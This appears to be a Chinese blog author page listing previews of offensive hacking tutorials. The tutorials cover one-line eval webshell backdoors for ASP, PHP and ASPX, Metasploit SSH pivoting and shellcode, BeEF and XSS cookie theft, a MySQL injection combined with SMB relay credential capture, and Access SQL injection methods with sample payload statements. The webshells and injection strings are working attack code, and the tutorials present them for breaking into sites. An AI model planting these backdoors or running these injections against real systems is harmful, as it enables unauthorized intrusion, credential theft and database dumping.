信安微凉
这个作者很懒,什么都没留下…
展开
-
Linux下的 菜刀 webhandler
你见过很强大的ASP后门,很强大的PHP后门,很强大的ASPX后门,那你见过很强大的asp,aspx,php三合一后门么……..,没有吧,尤其是这个后门,只有一句话。Asp环境:<%eval request("a")%>Php环境:<?php @eval($_POST['a']);?>Aspx环境:<% @page Language="Jscript"><%eval(Request.item["a"],"unsafe");%>原创 2022-03-23 20:48:32 · 1860 阅读 · 0 评论 -
Msf跳板: SSH 版本 route
其实就是利用SSH的端口转发做代理功能root@Kali:/tmp# git clone https://github.com/mubix/metassh.gitCloning into metassh...root@Kali:/tmp# cp -rf metassh/* /pen/msf3/plugins/启动MSF 载入插件msf > load meta_ssh[+] Added 2 Exploit modules for metaSSH[+] Added 1 Pa.原创 2022-03-23 20:45:40 · 1389 阅读 · 0 评论 -
METASPLOIT 和SHELLCODE
SHELLCODE就是溢出程序的后门。一个TCP反弹后门,如果某些EXP上的是弹出记事本 我们改如何生成自己想要的SHELLCODE?首先你要熟悉http://helen.dis9.com/?p=8 (METASPLOIT的PAYLOAD)我们来生成一个 打开UB 1生成BIND SHELL吧: 1234567891011121314151617181920212223242526272829303132333435原创 2022-02-28 20:53:41 · 1909 阅读 · 0 评论 -
MSF 综合利用: BEEF & XSS攻击(炊少教学)
获得Beef先安装git apt-get install gitbrk@Dis9Team:/pen$ sudo git clone https://github.com/beefproject/beef配置和安装数据库支持: apt-get install libssl-dev libsqlite3-dev sqlite我用sqlite数据库 简单 不麻烦RUBY配置:brk@Dis9Team:/pen/beef$ sudo gem install bundlerFetch原创 2022-02-27 21:56:05 · 441 阅读 · 0 评论 -
MSF 综合利用: MYSQL & SMBRelay攻击(炊少教学)
下面进入正文了,如果MYSQL以Administrator权限运行,那么这种攻击就能成功!下面来PENTEST : 一个注入点,他是ROOT的权限我们来尝试他能不能读文件,ROOT权限应该能读恩 ,能读文件 (惊现HELEL大黑客!)下面本地伪造个SMB SERVER服务器 msf > use auxiliary/server/capture/smb msf auxiliary(smb) > show ...原创 2022-02-27 21:52:40 · 703 阅读 · 0 评论 -
Metasploit 权限提升(炊少教学)
前言 现在的入侵是越来越难了,人们的安全意识都普遍提高了不少,连个人用户都懂得防火墙,杀毒软件要装备在手,对于微软的补丁升级也不再是不加问津。因此现在我们想在因特网上扫描弱口令的主机已经几乎是痴心妄想了。(这可是一件大大的好事啊。) 但是这也使得我们作黑客的进行入侵检测达到了一个前所未有的难度。通过各种手段,我们通常并不能直接获得一个系统的管理员权限。比如我们通过某些对IIS的攻击,只能获得IUSR-MACHINENAME的权限(如上传asp木马,以及某些溢出等)。这个帐号通常可是系统默认的gu原创 2022-02-26 22:58:31 · 643 阅读 · 0 评论 -
xss基础,进阶和触发
了解XSS的作用↓盗取cookie(直接登录管理员后台)如何判断存在XSS↓弹窗测试payload<script>alert('xss')</script>//< script > 开始js语句//< /script > 结束js语句Alert('内容') //js的弹窗语句HTML中标记通常是成对出现。常用语句<script>alert(xss)</script>我们输入一个r3bug提交查原创 2022-02-23 21:25:06 · 449 阅读 · 0 评论 -
access跨库注入
跨库注入之逐字猜解法跨库注入适用环境↓在B站点注入A站点。前提,B和A在同服。跨库目标位置C:\Program Files\r3sec\#Data.mdb判断存在的表↓And 1=(Select Count(*) from [数据库路径].[表]) 实际判断表的语句↓And 1=(Select Count(*) from [C:\Program Files\r3sec\#Data.mdb].[admin])判断字段And 1=(Select Coun.原创 2022-02-22 12:11:06 · 529 阅读 · 0 评论 -
access偏移注入
access偏移注入利用情景1.偏移注入指access偏移注入,主要是由于数据库结构的问题,其他数据库没办法利用。2.用于解决判断出表名,得不到字段的困境。偏移注入的特点1.看人品和技巧的注入方法,不是100%能成功(基本上看了我的总结成功率就很高了)。2.无需管理账号密码字段,直接爆账号密码。利用条件1.已知管理表名2.已知任意字段(一个或多个多个会增加几率)影响偏移注入成功率的因素1.管理表的字段数越少越好(最好就三个 1.id 2.账号字段 3.密码字段原创 2022-02-22 12:07:22 · 1761 阅读 · 0 评论 -
access逐字猜解法
联合查询↓优势:方便 快捷缺点:兼容性相对较差。逐字猜解法↓优势:兼容绝大多数注入点。缺点:很慢。工具所使用的语句↓猜字段↓---------------------------------------------------------------------------------------------------------------------------------and exists (select * from 表名) 获取表名and exi..原创 2022-02-20 19:00:31 · 513 阅读 · 0 评论 -
access拓展注入
注入中发生了什么脚本内sql语句sql="select * from product where id=&id"访问1137这个界面select * from product where id=1137访问1137 and 1=1 这是相等的访问select * from product where id=1137 and 1=1 正常select * from product where id=1137 and 1=2 报错select * from produ..原创 2022-02-19 22:48:41 · 313 阅读 · 0 评论 -
access手工注入-联合查询法
&注入的作用1.注入得到管理员账号 密码2.脱库&access注入语句and 1=1是判断是否存在注入的返回正常返回不正常 这是存在注入的猜字段猜字段数order by 字段数值一般情况下我们都从1开始order by 1order by 20order by 10order by 最终字段数值我们这样为了减少时间能更快的得到字段数到23就显示错误了 说明 字段是22 存在22个字段 最终得到的字段...原创 2022-02-19 22:45:36 · 1466 阅读 · 0 评论